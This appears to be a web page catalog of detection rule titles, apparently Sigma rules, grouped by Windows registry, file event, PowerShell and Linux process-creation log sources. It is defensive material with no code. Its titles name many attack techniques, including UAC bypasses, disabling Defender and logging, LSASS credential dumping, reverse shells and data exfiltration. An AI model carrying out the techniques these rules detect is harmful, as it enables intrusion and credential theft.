  • System Scripts Autorun Keys Modification
  • WinSock2 Autorun Keys Modification
  • Wow6432Node CurrentVersion Autorun Keys Modification
  • Wow6432Node Classes Autorun Keys Modification
  • New BgInfo.EXE Custom DB Path Registry Configuration
  • Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
  • New BgInfo.EXE Custom WMI Query Registry Configuration
  • New BgInfo.EXE Custom VBScript Registry Configuration
  • Bypass UAC Using Event Viewer
  • Blackbyte Ransomware Registry
  • Bypass UAC Using DelegateExecute
  • Bypass UAC Using SilentCleanup Task
  • Default RDP Port Changed to Non Standard Port
  • IE Change Domain Zone
  • Sysmon Driver Altitude Change
  • Change Winevt Channel Access Permission Via Registry
  • Running Chrome VPN Extensions via the Registry 2 VPN Extension
  • ClickOnce Trust Prompt Tampering
  • Potential CobaltStrike Service Installations - Registry
  • COM Hijack via Sdclt
  • CrashControl CrashDump Disabled
  • Service Binary in Suspicious Folder
  • Custom File Open Handler Executes PowerShell
  • Potential Registry Persistence Attempt Via DbgManagedDebugger
  • Windows Defender Exclusions Added - Registry
  • Potentially Suspicious Desktop Background Change Via Registry
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry
  • Hypervisor Enforced Code Integrity Disabled
  • Hypervisor Enforced Paging Translation Disabled
  • DHCP Callout DLL Installation
  • Disable Exploit Guard Network Protection on Windows Defender
  • Disable Administrative Share Creation at Startup
  • Disabled Windows Defender Eventlog
  • Disable PUA Protection on Windows Defender
  • Disable Tamper Protection on Windows Defender
  • Potential AutoLogger Sessions Tampering
  • Disable Microsoft Defender Firewall via Registry
  • Disable Internal Tools or Feature in Registry
  • Disable Macro Runtime Scan Scope
  • Disable Privacy Settings Experience in Registry
  • Disable Windows Security Center Notifications
  • Registry Disable System Restore
  • Windows Defender Service Disabled - Registry
  • Disable Windows Firewall by Registry
  • Disable Windows Event Logging Via Registry
  • Add DisallowRun Execution to Registry
  • Persistence Via Disk Cleanup Handler - Autorun
  • DNS-over-HTTPS Enabled by Registry
  • New DNS ServerLevelPluginDll Installed
  • ETW Logging Disabled In .NET Processes - Sysmon Registry
  • Directory Service Restore Mode(DSRM) Registry Value Tampering
  • Periodic Backup For System Registry Hives Enabled
  • Windows Recall Feature Enabled - Registry
  • Enabling COR Profiler Environment Variables
  • Potential EventLog File Location Tampering
  • Scripted Diagnostics Turn Off Check Enabled - Registry
  • Suspicious Application Allowed Through Exploit Guard
  • Change User Account Associated with the FAX Service
  • Change the Fax Dll
  • New File Association Using Exefile
  • Add Debugger Entry To Hangs Key For Persistence
  • Persistence Via Hhctrl.ocx
  • Registry Modification to Hidden File Extension
  • Displaying Hidden Files Feature Disabled
  • Registry Hide Function from User
  • Hide Schedule Task Via Index Value Tamper
  • Driver Added To Disallowed Images In HVCI - Registry
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
  • Uncommon Extension In Keyboard Layout IME File Registry Value
  • Suspicious Path In Keyboard Layout IME File Registry Value
  • New Root or CA or AuthRoot Certificate to Store
  • Internet Explorer DisableFirstRunCustomize Enabled
  • Potential Ransomware Activity Using LegalNotice Message
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download
  • Lsass Full Dump Request Via DumpType Registry Settings
  • RestrictedAdminMode Registry Value Tampering
  • Blue Mockingbird - Registry
  • Potential Persistence Via Netsh Helper DLL - Registry
  • New Netsh Helper DLL Registered From A Suspicious Location
  • NET NGenAssemblyUsageLog Registry Key Tamper
  • New Application in AppCompat
  • Potential Credential Dumping Attempt Using New NetworkProvider - REG
  • New ODBC Driver Registered
  • Potentially Suspicious ODBC Driver Registered
  • Microsoft Office Protected View Disabled
  • Trust Access Disable For VBApplications
  • Python Function Execution Security Warning Disabled In Excel - Registry
  • Enable Microsoft Dynamic Data Exchange
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
  • Outlook Macro Execution Without Warning Setting Enabled
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
  • Outlook Security Settings Updated - Registry
  • Uncommon Microsoft Office Trusted Location Added
  • Macro Enabled In A Potentially Suspicious Document
  • Office Macros Warning Disabled
  • MaxMpxCt Registry Value Changed
  • Potential Persistence Using DebugPath
  • Potential Persistence Via AppCompat RegisterAppRestart Layer
  • Potential Persistence Via App Paths Default Property
  • Potential Persistence Via AutodialDLL
  • Potential Persistence Via CHM Helper DLL
  • Potential PSFactoryBuffer COM Hijacking
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value
  • Potential Persistence Via Custom Protocol Handler
  • Potential Persistence Via Event Viewer Events.asp
  • Potential Persistence Via GlobalFlags
  • Modification of IE Registry Settings
  • Register New IFiltre For Persistence
  • Potential Persistence Via LSA Extensions
  • Potential Persistence Via Mpnotify
  • Potential Persistence Via Excel Add-in - Registry
  • Potential Persistence Via MyComputer Registry Keys
  • Potential Persistence Via TypedPaths
  • Potential Persistence Via Outlook Today Page
  • Potential Persistence Via Scrobj.dll COM Hijacking
  • Potential WerFault ReflectDebugger Registry Value Abuse
  • Potential Persistence Via Visual Studio Tools for Office
  • Suspicious Shim Database Patching Activity
  • PowerShell Script Execution Policy Enabled
  • Potential Attachment Manager Settings Associations Tamper
  • Potential Persistence Via Outlook Home Page
  • Potential Persistence Via DLLPathOverride
  • Potential Persistence Via Shim Database In Uncommon Location
  • Potential Attachment Manager Settings Attachments Tamper
  • PowerShell as a Service in Registry
  • Potential Persistence Via Shim Database Modification
  • Potential PowerShell Execution Policy Tampering
  • Suspicious Powershell In Registry Run Keys
  • PowerShell Logging Disabled Via Registry Key Tampering
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
  • Usage of Renamed Sysinternals Tools - RegistrySet
  • ETW Logging Disabled For rpcrt4.dll
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry
  • ScreenSaver Registry Key Set
  • Potential SentinelOne Shell Context Menu Scan Command Tampering
  • ETW Logging Disabled For SCM
  • ServiceDll Hijack
  • Registry Explorer Policy Modification
  • Persistence Via New SIP Provider
  • Tamper With Sophos AV Registry Keys
  • Hiding User Account Via SpecialAccounts Registry Key
  • Activate Suppression of Windows Security Center Notifications
  • Suspicious Environment Variable Has Been Registered
  • Suspicious Keyboard Layout Load
  • Potential PendingFileRenameOperations Tampering
  • Suspicious Printer Driver Empty Manufacturer
  • Registry Persistence via Explorer Run Key
  • New RUN Key Pointing to Suspicious Folder
  • Suspicious Service Installed
  • Modify User Shell Folders Startup Value
  • Enable LM Hash Storage
  • Scheduled TaskCache Change by Uncommon Program
  • Potential Registry Persistence Attempt Via Windows Telemetry
  • RDP Sensitive Settings Changed to Zero
  • RDP Sensitive Settings Changed
  • New TimeProviders Registered With Uncommon DLL Name
  • Old TLS1.0/TLS1.1 Protocol Version Enabled
  • COM Hijacking via TreatAs
  • Potential Signing Bypass Via Windows Developer Features - Registry
  • UAC Bypass via Event Viewer
  • UAC Bypass via Sdclt
  • UAC Bypass Abusing Winsat Path Parsing - Registry
  • UAC Bypass Using Windows Media Player - Registry
  • UAC Disabled
  • UAC Notification Disabled
  • UAC Secure Desktop Prompt Disabled
  • VBScript Payload Stored in Registry
  • Wdigest Enable UseLogonCredential
  • Execution DLL of Choice Using WAB.EXE
  • Disable Windows Defender Functionalities Via Registry Keys
  • Winget Admin Settings Modification
  • Enable Local Manifest Installation With Winget
  • Winlogon Notify Key Logon Persistence
  • Winlogon AllowMultipleTSSessions Enable
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
  • CVE-2021-31979 CVE-2021-33771 Exploits
  • Small Sieve Malware Registry Persistence
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
  • Outlook Task/Note Reminder Received
  • Potential COLDSTEEL RAT Windows User Creation
  • Potential Encrypted Registry Blob Related To SNAKE Malware
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence
  • Kapeka Backdoor Autorun Persistence
  • Kapeka Backdoor Configuration Persistence
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap
  • Forest Blizzard APT - Custom Protocol Handler Creation
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
  • Microsoft Office Trusted Location Updated
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
  • Command Executed Via Run Dialog Box - Registry
  • Service Binary in User Controlled Folder
  • Shell Context Menu Command Tampering
windows-file_event 207
Show Rules (207)
  • Suspicious File Event With Teams Objects
  • Suspicious Unattend.xml File Access
  • CrackMapExec File Creation Patterns
  • LSASS Memory Dump File Creation
  • CreateMiniDump Hacktool
  • Mimikatz MemSSP Default Log File Creation
  • Suspicious CLR Logs Creation
  • ADSI-Cache File Creation By Uncommon Tool
  • Advanced IP Scanner - File Event
  • Suspicious Binary Writes Via AnyDesk
  • Anydesk Temporary Artefact
  • Assembly DLL Creation Via AspNetCompiler
  • BloodHound Collection Files
  • EVTX Created In Uncommon Location
  • Creation Of Non-Existent System DLL
  • New Custom Shim Database Created
  • Suspicious Screensaver Binary File Creation
  • Files With System DLL Name In Unsuspected Locations
  • Files With System Process Name In Unsuspected Locations
  • Creation Exe for Service with Unquoted Path
  • Cred Dump Tools Dropped Files
  • WScript or CScript Dropper - File
  • Dynamic CSharp Compile Artefact
  • CSExec Service File Creation
  • Potential DCOM InternetExplorer.Application DLL Hijack
  • DLL Search Order Hijackig Via Additional Space in Path
  • Potentially Suspicious DMP/HDMP File Creation
  • Potential Persistence Attempt Via ErrorHandler.Cmd
  • Suspicious ASPX File Drop by Exchange
  • Suspicious File Drop by Exchange
  • GoToAssist Temporary Installation Artefact
  • HackTool - CrackMapExec File Indicators
  • HackTool - Typical HiveNightmare SAM File Export
  • HackTool - Dumpert Process Dumper Default File
  • HackTool - Inveigh Execution Artefacts
  • HackTool - Mimikatz Kirbi File Creation
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators
  • HackTool - NPPSpy Hacktool Usage
  • HackTool - Powerup Write Hijack DLL
  • HackTool - QuarksPwDump Dump File
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
  • HackTool - SafetyKatz Dump Indicator
  • Potential Initial Access via DLL Search Order Hijacking
  • Installation of TeamViewer Desktop
  • Malicious DLL File Dropped in the Teams or OneDrive Folder
  • ISO File Created Within Temp Folders
  • ISO or Image Mount Indicator in Recent Files
  • GatherNetworkInfo.VBS Reconnaissance Script Output
  • LSASS Process Memory Dump Files
  • LSASS Process Dump Artefact In CrashDumps Folder
  • WerFault LSASS Process Memory Dump
  • Octopus Scanner Malware
  • Adwind RAT / JRAT File Artifact
  • File Creation In Suspicious Directory By Msdt.EXE
  • Uncommon File Creation By Mysql Daemon Process
  • Suspicious DotNET CLR Usage Log Artifact
  • Suspicious File Creation In Uncommon AppData Folder
  • SCR File Write Event
  • Potential Persistence Via Notepad++ Plugins
  • NTDS.DIT Created
  • NTDS.DIT Creation By Uncommon Parent Process
  • NTDS.DIT Creation By Uncommon Process
  • NTDS Exfiltration Filename Patterns
  • Office Macro File Creation
  • Potential Persistence Via Microsoft Office Add-In
  • Office Macro File Download
  • Office Macro File Creation From Suspicious Process
  • OneNote Attachment File Dropped In Suspicious Location
  • Suspicious File Created Via OneNote Application
  • New Outlook Macro Created
  • .RDP File Created by Outlook Process
  • PCRE.NET Package Temp Files
  • Suspicious Outlook Macro Created
  • Publisher Attachment File Dropped In Suspicious Location
  • Potential Persistence Via Microsoft Office Startup Folder
  • File With Uncommon Extension Created By An Office Application
  • Uncommon File Created In Office Startup Folder
  • Potential Persistence Via Outlook Form
  • Suspicious File Created In PerfLogs
  • Potential Binary Or Script Dropper Via PowerShell
  • PowerShell Script Dropped Via PowerShell.EXE
  • Malicious PowerShell Scripts - FileCreation
  • PowerShell Module File Created
  • PowerShell Module File Created By Non-PowerShell Process
  • Potential Suspicious PowerShell Module File Created
  • Potential Startup Shortcut Persistence Via PowerShell.EXE
  • PSScriptPolicyTest Creation By Uncommon Process
  • Rclone Config File Creation
  • .RDP File Created By Uncommon Application
  • Potential Winnti Dropper Activity
  • PDF File Created By RegEdit.EXE
  • RemCom Service File Creation
  • ScreenConnect Temporary Installation Artefact
  • Remote Access Tool - ScreenConnect Temporary File
  • Potential RipZip Attack on Startup Folder
  • Potential SAM Database Dump
  • Self Extraction Directive File Created In Potentially Suspicious Location
  • Windows Shell/Scripting Application File Write to Suspicious Folder
  • Windows Binaries Write Suspicious Extensions
  • Startup Folder File Write
  • Suspicious Creation with Colorcpl
  • Created Files by Microsoft Sync Center
  • Suspicious Files in Default GPO Folder
  • Suspicious Desktopimgdownldr Target File
  • Suspicious desktop.ini Action
  • Suspicious Creation TXT File in User Desktop
  • Creation of a Diagcab
  • DPAPI Backup Keys And Certificate Export Activity IOC
  • Suspicious Double Extension Files
  • Suspicious MSExchangeMailboxReplication ASPX Write
  • Suspicious Executable File Creation
  • Suspicious Get-Variable.exe Creation
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
  • Potential Homoglyph Attack Using Lookalike Characters in Filename
  • Legitimate Application Dropped Archive
  • Legitimate Application Dropped Executable
  • Legitimate Application Dropped Script
  • Suspicious LNK Double Extension File Created
  • Suspicious PFX File Creation
  • PowerShell Profile Modification
  • Suspicious PROCEXP152.sys File Created In TMP
  • Suspicious File Creation Activity From Fake Recycle.Bin Folder
  • Potential File Extension Spoofing Using Right-to-Left Override
  • Drop Binaries Into Spool Drivers Color Folder
  • Suspicious Startup Folder Persistence
  • Suspicious Scheduled Task Write to System32 Tasks
  • Suspicious Interactive PowerShell as SYSTEM
  • TeamViewer Remote Session
  • VsCode Powershell Profile Modification
  • Windows Terminal Profile Settings Modification By Uncommon Process
  • WinSxS Executable File Creation By Non-System Process
  • LiveKD Kernel Memory Dump File Created
  • LiveKD Driver Creation
  • LiveKD Driver Creation By Uncommon Process
  • Process Explorer Driver Creation By Non-Sysinternals Binary
  • Process Monitor Driver Creation By Non-Sysinternals Binary
  • PsExec Service File Creation
  • PSEXEC Remote Execution File Artefact
  • Potential Privilege Escalation Attempt Via .Exe.Local Technique
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE
  • Hijack Legit RDP Session to Move Laterally
  • UAC Bypass Using Consent and Comctl32 - File
  • UAC Bypass Using .NET Code Profiler on MMC
  • UAC Bypass Using EventVwr
  • UAC Bypass Using IDiagnostic Profile - File
  • UAC Bypass Using IEInstal - File
  • UAC Bypass Using MSConfig Token Modification - File
  • UAC Bypass Using NTFS Reparse Point - File
  • UAC Bypass Abusing Winsat Path Parsing - File
  • UAC Bypass Using Windows Media Player - File
  • Creation of WerFault.exe/Wer.dll in Unusual Folder
  • VHD Image Download Via Browser
  • Visual Studio Code Tunnel Remote File Creation
  • Renamed VsCode Code Tunnel Execution - File Indicator
  • Potential Webshell Creation On Static Website
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
  • Wmiexec Default Output File
  • Wmiprvse Wbemcomn DLL Hijack - File
  • WMI Persistence - Script Event Consumer File Write
  • UEFI Persistence Via Wpbbin - FileCreation
  • Writing Local Admin Share
  • APT29 2018 Phishing Campaign File Indicators
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern
  • CVE-2021-26858 Exchange Exploitation
  • Suspicious Word Cab File Write CVE-2021-40444
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
  • CVE-2021-44077 POC Default Dropped File
  • Potential Devil Bait Related Indicator
  • Goofy Guineapig Backdoor IOC
  • Moriya Rootkit File Created
  • Pingback Backdoor File Indicators
  • Small Sieve Malware File Indicator Creation
  • CVE-2022-24527 Microsoft Connected Cache LPE
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
  • Potential CVE-2023-36884 Exploitation Dropped File
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
  • CVE-2023-40477 Potential Exploitation - .REV File Creation
  • Potential COLDSTEEL RAT File Indicators
  • Potential COLDSTEEL Persistence Service DLL Creation
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process
  • SNAKE Malware Kernel Driver File Indicator
  • SNAKE Malware WerFault Persistence File Creation
  • SNAKE Malware Installer Name Indicators
  • Diamond Sleet APT File Creation Indicators
  • Potential APT FIN7 Related PowerShell Script Created
  • Lace Tempest File Indicators
  • Onyx Sleet APT File Creation Indicators
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
  • ScreenConnect User Database Modification
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory
  • File Creation Related To RAT Clients
  • Potential Kapeka Decrypted Backdoor Indicator
  • Forest Blizzard APT - File Creation Activity
  • Forest Blizzard APT - JavaScript Constrained File Creation
  • ScreenConnect - SlashAndGrab Exploitation Indicators
  • DMP/HDMP File Creation
  • Python Path Configuration File Creation - Windows
  • Scheduled Task Created - FileCreation
  • Creation of an Executable by an Executable
  • VsCode Code Tunnel Execution File Indicator
  • WebDAV Temporary Local File Creation
  • File Creation by Office Applications
  • Files Dropped to Program Files by Non-Priviledged Process
windows-ps_script 184
Show Rules (184)
  • Accessing Encrypted Credentials from Google Chrome Login Database
  • AzureHound PowerShell Commands
  • Execution via CL_Invocation.ps1 - Powershell
  • Execution via CL_Mutexverifiers.ps1
  • Powershell File and Directory Discovery
  • Dnscat Execution
  • PrintNightmare Powershell Exploitation
  • Suspicious Get-WmiObject
  • AADInternals PowerShell Cmdlets Execution - PsScript
  • Access to Browser Login Data
  • Potential Active Directory Enumeration Using AD Module - PsScript
  • Add Windows Capability Via PowerShell Script
  • Powershell Add Name Resolution Policy Table Rule
  • PowerShell ADRecon Execution
  • AMSI Bypass Pattern Assembly GetType
  • Potential AMSI Bypass Script Using NULL Bits
  • Silence.EDA Detection
  • Get-ADUser Enumeration Using UserAccountControl Flags
  • Potential Data Exfiltration Via Audio File
  • Automated Collection Command PowerShell
  • Windows Screen Capture with CopyFromScreen
  • Clearing Windows Console History
  • Clear PowerShell History - PowerShell
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
  • Powershell Create Scheduled Task
  • Powershell Install a DLL in System Directory
  • Registry-Free Process Scope COR_PROFILER
  • PowerShell Create Local User
  • Create Volume Shadow Copy with Powershell
  • Powershell Detect Virtualization Environment
  • DirectorySearcher Powershell Exploitation
  • Manipulation of User Computer or Group Security Principals Across AD
  • Disable Powershell Command History
  • Disable-WindowsOptionalFeature Command PowerShell
  • Potential In-Memory Execution Using Reflection.Assembly
  • Potential COM Objects Download Cradles Usage - PS Script
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
  • Dump Credentials from Windows Credential Manager With PowerShell
  • Enable Windows Remote Management
  • Potential Suspicious Windows Feature Enabled
  • Enumerate Credentials from Windows Credential Manager With PowerShell
  • Disable of ETW Trace - Powershell
  • Suspicious PowerShell Mailbox SMTP Forward Rule
  • Certificate Exported Via PowerShell - ScriptBlock
  • Suspicious FromBase64String Usage On Gzip Archive - Ps Script
  • Service Registry Permissions Weakness Check
  • Active Directory Computers Enumeration With Get-AdComputer
  • Active Directory Group Enumeration With Get-AdGroup
  • Suspicious Get-ADReplAccount
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell
  • Security Software Discovery Via Powershell Script
  • HackTool - Rubeus Execution - ScriptBlock
  • HackTool - WinPwn Execution - ScriptBlock
  • PowerShell Hotfix Enumeration
  • PowerShell ICMP Exfiltration
  • Import PowerShell Modules From Suspicious Directories
  • Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript
  • Execute Invoke-command on Remote Host
  • Powershell DNSExfiltration
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell
  • Invoke-Obfuscation STDIN+ Launcher - Powershell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell
  • Invoke-Obfuscation Via Stdin - Powershell
  • Invoke-Obfuscation Via Use Clip - Powershell
  • Invoke-Obfuscation Via Use MSHTA - PowerShell
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell
  • Powershell Keylogging
  • Powershell LocalAccount Manipulation
  • Suspicious PowerShell Mailbox Export to Share - PS
  • Malicious PowerShell Commandlets - ScriptBlock
  • Live Memory Dump Using Powershell
  • Malicious PowerShell Keywords
  • Modify Group Policy Settings - ScriptBlockLogging
  • Powershell MsXml COM Object
  • Malicious Nishang PowerShell Commandlets
  • NTFS Alternate Data Stream
  • Code Executed Via Office Add-in XLL File
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock
  • Potential Invoke-Mimikatz PowerShell Script
  • PowerShell Web Access Installation - PsScript
  • PowerView PowerShell Cmdlets - ScriptBlock
  • PowerShell Credential Prompt
  • PSAsyncShell - Asynchronous TCP Reverse Shell
  • PowerShell PSAttack
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock
  • PowerShell Remote Session Creation
  • PowerShell Script With File Hostname Resolving Capabilities
  • Request A Single Ticket via PowerShell
  • Root Certificate Installed - PowerShell
  • Suspicious Invoke-Item From Mount-DiskImage
  • PowerShell Script With File Upload Capabilities
  • PowerShell Script Change Permission Via Set-Acl - PsScript
  • Powershell Sensitive File Discovery
  • PowerShell Set-Acl On Windows Folder - PsScript
  • Change PowerShell Policies to an Insecure Level - PowerShell
  • PowerShell ShellCode
  • Malicious ShellIntel PowerShell Commandlets
  • Detected Windows Software Discovery - PowerShell
  • Powershell Store File In Alternate Data Stream
  • Potential Persistence Via Security Descriptors - ScriptBlock
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock
  • Potential PowerShell Obfuscation Using Character Join
  • Suspicious Eventlog Clear
  • Powershell Directory Enumeration
  • Suspicious PowerShell Download - Powershell Script
  • Powershell Execute Batch Script
  • Troubleshooting Pack Cmdlet Execution
  • Extracting Information with PowerShell
  • PowerShell Get-Process LSASS in ScriptBlock
  • Suspicious GetTypeFromCLSID ShellExecute
  • Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy
  • Suspicious PowerShell Get Current User
  • Suspicious GPO Discovery With Get-GPO
  • Suspicious Process Discovery With Get-Process
  • Suspicious Hyper-V Cmdlets
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • Suspicious IO.FileStream
  • Change User Agents with WebRequest
  • Potential Keylogger Activity
  • Suspicious Get Local Groups Information - PowerShell
  • Potential Suspicious PowerShell Keywords
  • Powershell Local Email Collection
  • PowerShell Deleted Mounted Share
  • Suspicious Mount-DiskImage
  • Suspicious Connection to Remote Account
  • Suspicious New-PSDrive to Admin Share
  • Suspicious TCP Tunnel Via PowerShell Script
  • Recon Information for Export with PowerShell
  • Remove Account From Domain Admin Group
  • Suspicious Service DACL Modification Via Set-Service Cmdlet - PS
  • Suspicious Get Information for SMB Share
  • Potential PowerShell Obfuscation Using Alias Cmdlets
  • Suspicious SSL Connection
  • Suspicious Start-Process PassThru
  • Suspicious Unblock-File
  • Powershell Suspicious Win32_PnPEntity
  • Replace Desktop Wallpaper by Powershell
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script
  • Suspicious PowerShell WindowStyle Option
  • PowerShell Write-EventLog Usage
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Script
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging
  • Tamper Windows Defender - ScriptBlockLogging
  • Testing Usage of Uncommonly Used Port
  • Powershell Timestomp
  • Powershell Token Obfuscation - Powershell
  • User Discovery And Export Via Get-ADUser Cmdlet - PowerShell
  • Potential Persistence Via PowerShell User Profile Using Add-Content
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS
  • Veeam Backup Servers Credential Dumping Script Execution
  • Usage Of Web Request Commands And Cmdlets - ScriptBlock
  • Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
  • PowerShell WMI Win32_Product Install MSI
  • Windows Firewall Profile Disabled
  • Winlogon Helper DLL
  • Potential WinAPI Calls Via PowerShell Scripts
  • Windows Defender Exclusions Added - PowerShell
  • WMImplant Hack Tool
  • Powershell WMI Persistence
  • WMIC Unquoted Services Path Lookup - PowerShell
  • Suspicious X509Enrollment - Ps Script
  • Powershell XML Execute Command
  • Potential APT FIN7 POWERHOLD Execution
  • Potential POWERTRASH Script Execution
  • Lace Tempest PowerShell Evidence Eraser
  • Lace Tempest PowerShell Launcher
  • Compress-Archive Cmdlet Execution
  • Windows Mail App Mailbox Access Via PowerShell Script
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock
  • SMB over QUIC Via PowerShell Script
  • Potential Registry Reconnaissance Via PowerShell Script
  • Use Of Remove-Item to Delete File - ScriptBlock
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet
  • WinAPI Library Calls Via PowerShell Scripts
  • WinAPI Function Calls Via PowerShell Scripts
  • Execution via CL_Invocation.ps1 (2 Lines)
  • Execution via CL_Mutexverifiers.ps1 (2 Lines)
linux-process_creation 121
Show Rules (121)
  • Shell Invocation via Apt - Linux
  • Scheduled Task/Job At
  • Suspicious Invocation of Shell via AWK - Linux
  • Decode Base64 Encoded Text
  • Linux Base64 Encoded Pipe to Shell
  • Bash Interactive Shell
  • BPFtrace Unsafe Option Usage
  • Enable BPF Kprobes Tracing
  • Capabilities Discovery - Linux
  • Capsh Shell Invocation - Linux
  • Remove Immutable File Attribute
  • Linux Base64 Encoded Shebang In CLI
  • Clipboard Collection with Xclip Tool
  • Clear Linux Logs
  • Cat Sudoers
  • Commands to Clear or Remove the Syslog
  • Crontab Enumeration
  • Copy Passwd Or Shadow From TMP Path
  • Remove Scheduled Cron Task/Job
  • Linux Crypto Mining Indicators
  • Curl Usage on Linux
  • Atlassian Confluence CVE-2022-26134
  • Apache Spark Shell Command Injection - ProcessCreation
  • DD File Overwrite
  • Potential Linux Process Code Injection Via DD Utility
  • Ufw Force Stop Using Ufw-Init
  • Linux Doas Tool Execution
  • Shell Invocation via Env Command - Linux
  • ESXi Network Configuration Discovery Via ESXCLI
  • ESXi Admin Permission Assigned To Account Via ESXCLI
  • ESXi Storage Information Discovery Via ESXCLI
  • ESXi Syslog Configuration Change Via ESXCLI
  • ESXi System Information Discovery Via ESXCLI
  • ESXi Account Creation Via ESXCLI
  • ESXi VM List Discovery Via ESXCLI
  • ESXi VM Kill Via ESXCLI
  • ESXi VSAN Information Discovery Via ESXCLI
  • File and Directory Discovery - Linux
  • File Deletion
  • Shell Execution via Find - Linux
  • Shell Execution via Flock - Linux
  • Shell Execution GCC - Linux
  • Shell Execution via Git - Linux
  • OS Architecture Discovery Via Grep
  • Group Has Been Deleted Via Groupdel
  • Install Root Certificate
  • Suspicious Package Installed - Linux
  • Flush Iptables Ufw Chain
  • Local System Accounts Discovery - Linux
  • Local Groups Discovery - Linux
  • Potential GobRAT File Discovery Via Grep
  • Named Pipe Created Via Mkfifo
  • Potentially Suspicious Named Pipe Created Via Mkfifo
  • Mount Execution With Hidepid Parameter
  • Potential Netcat Reverse Shell Execution
  • Shell Execution via Nice - Linux
  • Nohup Execution
  • Suspicious Nohup Execution
  • OMIGOD SCX RunAsProvider ExecuteScript
  • OMIGOD SCX RunAsProvider ExecuteShellCommand
  • Potential Perl Reverse Shell Execution
  • Potential PHP Reverse Shell
  • Pnscan Binary Data Transmission Activity
  • Connection Proxy
  • Python Spawning Pretty TTY Via PTY Module
  • Python Reverse Shell Execution Via PTY And Socket Modules
  • Inline Python Execution - Spawn Shell Via OS System Library
  • Remote Access Tool - Team Viewer Session Started On Linux Host
  • Linux Remote System Discovery
  • Linux Package Uninstall
  • Shell Execution via Rsync - Linux
  • Suspicious Invocation of Shell via Rsync
  • Potential Ruby Reverse Shell
  • Scheduled Cron Task/Job - Linux
  • Security Software Discovery - Linux
  • Disabling Security Tools
  • Disable Or Stop Services
  • Setuid and Setgid
  • Shell Invocation Via Ssh - Linux
  • Potential Linux Amazon SSM Agent Hijacking
  • Sudo Privilege Escalation CVE-2019-14287
  • Chmod Suspicious Directory
  • Container Residence Discovery Via Proc Virtual FS
  • Suspicious Curl File Upload - Linux
  • Suspicious Curl Change User Agents - Linux
  • Docker Container Discovery Via Dockerenv Listing
  • Potentially Suspicious Execution From Tmp Folder
  • Potential Discovery Activity Using Find - Linux
  • Suspicious Git Clone - Linux
  • History File Deletion
  • Print History File Contents
  • Linux HackTool Execution
  • Potential Container Discovery Via Inodes Listing
  • Interactive Bash Suspicious Children
  • Suspicious Java Children Processes
  • Linux Network Service Scanning Tools Execution
  • Linux Shell Pipe to Shell
  • Linux Recon Indicators
  • Potential Suspicious Change To Sensitive/Critical Files
  • Execution Of Script Located In Potentially Suspicious Directory
  • Shell Execution Of Process Located In Tmp Directory
  • System Information Discovery
  • System Network Connections Discovery - Linux
  • System Network Discovery - Linux
  • Touch Suspicious Service File
  • Triple Cross eBPF Rootkit Execve Hijack
  • Triple Cross eBPF Rootkit Install Commands
  • User Has Been Deleted Via Userdel
  • User Added To Root/Sudoers Group Using Usermod
  • Vim GTFOBin Abuse - Linux
  • Linux Webshell Indicators
  • Download File To Potentially Suspicious Directory Via Wget
  • Potential Xterm Reverse Shell
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
